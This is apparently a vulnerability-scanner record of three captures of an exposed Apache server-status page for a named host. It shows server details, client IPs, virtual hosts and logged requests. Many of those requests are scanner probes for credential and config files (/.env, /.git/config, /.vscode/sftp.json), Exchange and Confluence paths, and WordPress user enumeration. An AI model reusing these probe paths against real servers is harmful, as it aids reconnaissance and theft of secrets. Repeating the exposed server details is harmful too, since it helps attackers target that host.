139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-6716916220/1/7463_ 0.040027088000.00.01118.22 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-6716916220/2/7545_ 0.040035748250.00.00157.64 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-6716916220/1/7488_ 0.040024590460.00.00133.18 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-6716916220/1/7321_ 0.030028140730.00.00118.21 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-6716916220/1/7634_ 0.030032697560.00.00126.00 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-6716916220/1/7437_ 0.040017422300.00.00137.23 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-6716916220/0/7505_ 0.0002824327710.00.00125.77 139.144.150.45http/1.1 0-6716916220/2/7386_ 0.030016718380.00.0198.56 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-6716916200/2/7343_ 0.031018783270.00.00105.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6716916200/1/7265_ 0.030027027990.00.00138.27 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-6716916200/0/7313_ 0.0003016025200.00.00206.65 209.206.24.44h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6716916200/2/7338_ 0.030024233230.00.01139.66 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-6716916200/1/7583_ 0.030022048510.00.00117.06 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-6716916200/1/7619_ 0.030021603860.00.00138.22 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-6716916200/0/7185_ 0.00047623516550.00.0094.96 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-6716916200/2/7653_ 0.030015221660.00.00127.37 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6716916200/1/7727_ 0.021020005530.00.00139.39 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-6716916200/0/7760_ 0.001013585340.00.00134.52 172.70.100.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6716917510/4/6447_ 0.060029506290.00.1798.87 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-6716917510/2/6543_ 0.060012889790.00.00112.44 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-6716917510/4/6192_ 0.060014162010.00.00120.95 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-6716917510/2/6288_ 0.060034272620.00.00134.62 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-6716917510/1/6780_ 0.051015216110.00.00170.31 139.144.150.45http/1.1 2-6716917510/1/6054_ 0.060032454570.00.00117.00 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-6716917510/0/6329_ 0.000020702850.00.00133.89 178.62.73.12http/1.1 2-6716917510/1/6108_ 0.060026980060.00.00134.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-6716917510/3/6696_ 0.060029104080.00.00126.17 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-6716917510/2/6176_ 0.060025015690.00.01124.74 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-6716916210/1/5163_ 0.0203729892440.00.00124.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\x04\x01 3-6716916210/1/5648_ 0.020026978780.00.00129.31 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-6716916210/0/5609_ 0.0005727241260.00.0095.98 139.144.150.45http/1.1 3-6716916210/2/5208W 0.020044977500.00.00103.31 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-6716916210/2/5323_ 0.020023896820.00.00143.94 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-6716916210/1/5289_ 0.020016695230.00.0076.92 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-6716916210/1/5581_ 0.020028162340.00.00109.00 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-6716916210/0/5396_ 0.0002818431920.00.00117.22 185.210.245.100h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6716916210/2/5377_ 0.020041373320.00.0080.37 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-6716916210/2/5155_ 0.030020475280.00.0083.23 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-6716916190/2/5496_ 0.060024694170.00.00106.73 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-6716916190/1/5325_ 0.0003331040740.00.00112.52 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-6716916190/1/5426_ 0.080014133390.00.01133.59 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-6716916190/2/4981_ 0.060034077730.00.01164.25 139.144.150.45http/1.1 4-6716916190/3/5246_ 0.080025154210.00.0196.52 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-6716916190/2/5038_ 0.080011955560.00.00144.89 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-6716916190/1/5331_ 0.05080012970710.00.03<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc88de23005
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 07-Jan-2024 07:31:56 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 8 days 21 hours 10 minutes 43 seconds Server load: 0.11 0.68 0.52 Total accesses: 254499 - Total Traffic: 4.4 GB - Total Duration: 101894580 CPU Usage: u36.9 s44.24 cu1197.48 cs841.05 - .276% CPU load .332 requests/sec - 6.0 kB/second - 18.2 kB/request - 400.373 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01576119no0yes010000 11576120no0yes010000 21576118no0yes010000 31576256no0yes010000 41576285no0yes19000 Sum500 149000 ____________________________________________W_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4615761190/8/5961_ 4.7346128356820.00.11104.06 162.158.90.164h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/5/5833_ 4.721144015381630.00.03105.47 162.158.91.37h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/8/5978_ 4.78114863013463550.00.0596.64 172.70.206.205h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/8/6217_ 4.7051527044540.00.07136.64 162.158.90.162h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/10/6055_ 4.731143016156700.00.0686.29 162.158.90.129h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-4615761190/11/5625_ 4.7146220528520.00.1291.96 162.158.90.190h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/8/6265_ 4.711143129276800.00.06105.21 162.158.90.164h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/5/6096_ 4.77114962312468070.00.06116.84 172.69.33.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/10/5907_ 5.1451021166500.00.0887.99 172.69.65.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4615761190/6/5842_ 4.141144013109990.00.0768.85 162.158.186.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/10/6590_ 5.12617016387230.00.0575.88 173.236.152.119http/1.1barrerasdecontencion.com:443GET /wp-login.php HTTP/1.1 1-4615761200/4/6256_ 4.7461024431320.00.01118.47 172.69.65.225h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/7/6500_ 4.74316012527440.00.05172.49 162.158.90.105h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/6/6494_ 4.72311021425790.00.22111.67 172.69.65.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/4/6611_ 4.720019174790.00.0099.27 162.158.90.23h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/5/6679_ 5.141019103560.00.0694.39 137.184.162.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-4615761200/11/6402_ 4.713021189180.00.0676.17 137.184.162.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4615761200/6/6543_ 4.92252111566220.00.03109.79 137.184.162.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4615761200/12/6823_ 4.71311117588120.00.07120.02 162.158.90.84h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4615761200/8/6779_ 5.03316011071990.00.06116.79 162.158.175.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/13/4895_ 5.391189017338720.00.2073.58 162.158.91.48h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/17/4907_ 5.37115709541350.00.3080.36 162.158.90.140h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/14/4472_ 5.391188010434580.01.0394.59 162.158.91.51h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/16/4639_ 5.411188030198270.00.3384.64 172.69.64.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/17/4593_ 5.45116141311196480.00.26111.82 172.69.34.32h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/18/4323_ 5.44116259228934830.00.1873.64 172.69.33.223h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/12/4462_ 5.421157016656870.00.1784.21 162.158.91.90h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/9/4477_ 5.381156222078580.00.3394.25 162.158.90.218h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/13/4680_ 5.421155025327290.00.1287.11 162.158.91.45h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4615761180/14/4636_ 5.364121303890.00.1074.51 137.184.162.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-4615762560/55/3646_ 7.450026564350.00.7468.54 137.184.162.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-4615762560/53/3572_ 7.3839666620604610.00.7351.14 137.184.162.65http/1.1 3-4615762560/59/3704_ 7.423021100770.00.7966.86 137.184.162.65http/1.1 3-4615762560/60/3873_ 7.364730631241029000.02.6463.19 162.158.22.166http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/52/3859_ 7.414728420560290.00.5966.81 172.71.150.251h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/61/3624_ 7.384740511886060.02.1753.09 162.158.134.97h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/58/3870_ 7.240023899660.01.1885.41 162.158.22.139h2tandemsl.com:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 3-4615762560/51/3862_ 7.40482314435780.00.9080.19 172.71.186.171h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4615762560/63/3746_ 7.41323335341950.00.7252.74 137.184.162.65http/1.1 3-4615762560/54/3701_ 7.3422815587430.00.9448.84 137.184.162.65http/1.1 4-4615762850/48/4838_ 7.541023057580.00.7393.84 137.184.162.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-4615762850/53/4566_ 7.541029306190.00.6685.50 137.184.162.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-4615762850/54/4831_ 7.49257312687070.01.4192.77 137.184.162.65http/1.1 4-4615762850/63/4390_ 7.4246681232613780.01.13139.49 162.158.22.91http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4615762850/52/4590W 7.530023448590.01.1874.47 137.184.162.65http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-4615762850/85/4268_ 7.50430410400330.01.33107.76 137.184.162.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4615762850/61/4570_ 7.540011342400.00.7089.97 137.184.162.65http/1.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc85e93dec4
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 05-Jan-2024 22:38:37 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 7 days 12 hours 17 minutes 24 seconds Server load: 0.02 0.10 0.05 Total accesses: 239093 - Total Traffic: 4.1 GB - Total Duration: 84372448 CPU Usage: u51.63 s53.28 cu1050.94 cs713.75 - .288% CPU load .368 requests/sec - 6.7 kB/second - 18.2 kB/request - 352.885 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01507115no1yes010000 11507244no0yes010000 21507114no0yes010000 31507112no0yes010000 41507113no0yes19000 Sum501 149000 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3815071150/324/5755_ 15.72139327822310.03.3099.46 172.71.30.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/321/5622_ 15.890014708450.03.24102.19 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3815071150/320/5757_ 15.842260212920730.02.6291.88 172.70.55.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/330/5981_ 15.87080226321380.03.67133.11 161.35.27.144http/1.1 0-3815071150/326/5844_ 15.87024215540800.03.2983.19 161.35.27.144http/1.1 0-3815071150/322/5380_ 15.881019945270.03.3678.13 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3815071150/349/6059_ 15.76187628519030.02.56101.60 172.71.154.204h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/336/5874_ 15.852128911896430.01.98114.40 172.70.254.197h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/337/5703_ 15.8421020596790.04.5385.88 172.70.255.6h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3815071150/338/5610_ 15.8702412295300.02.6367.19 161.35.27.144http/1.1 1-3815072440/139/6154_ 11.410014918600.01.1971.44 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3815072440/147/5846_ 11.180014786660.013.72114.26 161.35.27.144http/1.1 1-3815072440/146/6093_ 10.682712711079040.00.70166.39 108.162.212.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/144/6095_ 10.662762620116320.00.6490.48 141.101.100.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/135/6229_ 10.59271117818490.00.4093.81 172.71.186.197h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/144/6262_ 10.420017517520.02.1175.40 108.162.220.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/141/5989_ 10.6402719744590.01.7669.33 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3815072440/134/6085_ 11.26471210026840.01.19103.68 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1704490245.69741201400756835937 1-3815072440/143/6405_ 10.664712816021230.01.10112.35 108.162.212.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/145/6333_ 11.3227609441330.01.36112.91 141.101.100.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/52/4331_ 8.5234015981440.00.9866.39 108.162.221.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/55/4475_ 8.2171308106940.00.3973.86 172.70.91.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/55/4030_ 7.62018676780.00.2981.13 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3815071140/62/4224_ 8.52707028679400.01.6477.10 108.162.221.124h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/49/4107_ 9.453909745150.01.32103.23 172.70.254.226h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/62/3859_ 8.737082627453640.01.0567.31 172.70.93.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/52/4015_ 8.81116815083300.00.2876.02 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3815071140/58/4052_ 9.460020692750.00.4787.47 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3815071140/54/4153_ 8.703439012426690.00.4779.62 108.162.245.101h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/57/4131_ 8.5339019979410.01.2365.09 108.162.221.147h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3815071120/54/3463_ 9.150521810560.01.0464.70 161.35.27.144http/1.1 3-3815071120/49/3393_ 9.457322615182830.00.3448.37 172.70.55.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/47/3526_ 10.1441017482080.01.1262.76 172.70.55.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/51/3705_ 9.14731129263130.00.4458.07 108.162.220.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/61/3714_ 9.91732018283580.01.5264.30 172.71.26.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/49/3434_ 9.9441010864470.00.7548.33 198.41.224.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/44/3699_ 9.943628018306910.00.5181.31 198.41.224.220h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/49/3699_ 9.417302411681720.00.6075.92 141.101.68.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/48/3591_ 9.1436026143910.00.2550.98 108.162.221.104h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/54/3525_ 9.60730312811410.00.3746.51 162.158.174.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/233/4582W 14.960021558720.03.3090.52 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-3815071130/222/4293_ 14.7902811522320.02.5180.02 172.71.186.40h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3815071130/227/4574_ 15.02059511905820.03.4788.63 108.162.216.193h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/234/4131_ 15.100030342180.02.42135.09 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-3815071130/251/4336_ 14.94151222696620.04.4570.53 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3815071130/235/3976_ 15.10008970560.02.85105.10 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-3815071130/231/4308_ 15.08
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc82310b6c5
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 24-Dec-2023 05:05:53 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 96 Parent Server MPM Generation: 95 Server uptime: 17 days 21 hours 24 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 388252 - Total Traffic: 10.3 GB - Total Duration: 206169178 CPU Usage: u44.02 s63.01 cu2136.42 cs1642.47 - .251% CPU load .251 requests/sec - 7.0 kB/second - 27.9 kB/request - 531.019 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0920876no2yes010001 1920877no1yes010000 2920878no2yes010001 3920879no1yes010000 4921042no1yes19000 Sum507 149002 _________________________________________W________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-959208760/10/6744_ 2.461038606900.00.03172.74 172.70.43.115h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/15/7324_ 2.464050728360.00.09202.56 172.71.223.181h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/11/7367_ 2.266027752030.00.05216.84 141.101.100.168h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/9/6718_ 2.264033777120.00.14210.93 141.101.100.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/9/6952_ 2.254037580830.00.15173.20 141.101.100.195h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/8/7247_ 2.04542531908770.00.07230.02 172.70.38.58h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/15/7007_ 2.463023268060.00.03207.63 172.70.38.72h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/13/7351_ 2.223342144310.00.15162.94 172.71.30.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/12/6594_ 2.261033503810.00.21237.10 141.101.100.136h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-959208760/15/7122_ 2.472049370510.00.09254.12 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-959208770/6/6615_ 2.120018616070.00.01221.27 141.101.100.189h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-959208770/10/6363_ 2.314029855300.00.01146.57 172.70.38.127h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/9/6097_ 2.311036537350.00.11156.21 172.70.38.114h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/9/6478_ 2.22512143194120.00.02231.73 128.199.62.55http/1.1barrerasdecontencion.com:443GET / HTTP/1.1 1-959208770/11/5920_ 2.114029739000.00.05231.74 141.101.100.147h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/9/6693_ 2.3250133964690.00.01226.48 172.70.42.200h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/6/6431_ 2.125035748900.00.04126.91 128.199.62.55http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/9/6180_ 2.071232472390.00.06200.33 172.71.30.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/8/6254_ 2.095087561960.00.09131.00 172.71.31.52h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-959208770/9/6039_ 2.310023284530.00.05128.90 172.71.222.43h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/46/7786_ 3.900027748010.00.94148.03 172.71.223.158h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/37/7747_ 3.921051800600.013.33232.53 172.71.223.92h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/45/7536_ 3.902042662950.00.34223.18 172.71.222.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/36/7854_ 3.89218026757950.00.20214.09 172.70.42.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/35/7929_ 3.872028307680.01.10254.74 172.71.254.127h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/35/8069_ 3.8013720961610.00.10176.21 162.158.22.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/47/7337_ 3.74010628324440.01.43196.92 128.199.62.55http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/43/7500_ 3.782030711880.00.22207.00 128.199.64.114http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-959208780/44/7829_ 3.921033584860.01.01228.59 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-959208780/35/7170_ 3.871039470990.00.68210.65 172.70.100.230h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/8/7687_ 2.600026061400.00.03275.15 172.70.42.230h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/10/8056_ 2.575125254760.00.06189.44 172.71.254.76h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-959208790/5/8129_ 2.384055041690.00.02171.53 192.53.126.23http/1.1 3-959208790/3/8004_ 